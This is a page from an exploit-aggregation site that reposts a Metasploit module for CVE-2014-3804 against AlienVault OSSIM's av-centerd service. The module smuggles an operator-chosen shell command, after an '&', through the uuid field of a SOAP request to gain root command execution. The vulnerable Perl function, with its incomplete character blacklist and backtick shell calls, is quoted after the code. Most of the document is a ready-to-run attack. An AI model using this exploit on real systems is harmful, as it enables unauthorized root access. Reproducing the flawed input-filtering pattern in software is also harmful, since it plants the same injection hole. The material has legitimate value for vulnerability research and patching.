Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090096

Below is a copy:

Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution
require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name'        => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References'  =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author'      => [ 'james fitts' ],
'License'     => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')

register_options([
Opt::RPORT(40007),
OptBool.new('SSL',   [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)

end

def run

soap =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "</sync_rserver>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"

res = send_request_cgi(
{
'uri'=>'/av-centerd',
'method'=>'POST',
'ctype'=>'text/xml; charset=UTF-8',
'data'=>soap,
'headers'=>{
'SOAPAction'=>"\"AV/CC/Util#sync_rserver\""
}
}, 20)

if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end

end

end
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub sync_rserver
{
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
    verbose_log_file(
        "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
    );

    if ($uuid =~  /[;`\$\<\>\|]/) {
        console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
        my @ret = ("Error");
        return \@ret;
    }

    my $conn = Avtools::get_database();
    my $sqlfile = "/tmp/sync_${uuid}.sql";
    my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
    my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
    my $sqlfile_content;
    my $status = 1;
    my $counter = 0;
    my @ret;
    my $query = qq{};
    my $dbq;

    if ( -f $sqlfile_old )
    {
        my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
        debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
        if ( $sqlfile_md5 eq $sqlfile_old_md5 )
        {
            unlink $sqlfile;
            verbose_log_file ("Already sync'ed!");
            return "0";
        }
        else
        {
            unlink $sqlfile_old;
        }
    }

    my $query_array = `ossim-db < $sqlfile 2>&1`;
    $query_array =~ s/[\s\n]+$//g;
    if ($query_array ne '')
    {
        $status = $query_array;
    }
    else
    {
        $status = 0;
    }

    if ( ! (defined $status) or $status == 0 )
    {
        if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
        {
            verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
            system('/etc/init.d/ossim-server restart');
        }
        else
        {
            debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
        }

        $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
        debug_log_file($query);
        $dbq = $conn->prepare($query);
        $dbq->execute();
        $dbq->finish();
    }
    else
    {
        verbose_log_file ("Error syncing rservers: ${status}");
    }

    debug_log_file("Move file: $sqlfile");
    move ($sqlfile, $sqlfile . ".old");

#    push @ret, "0";
    return "0";
}

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.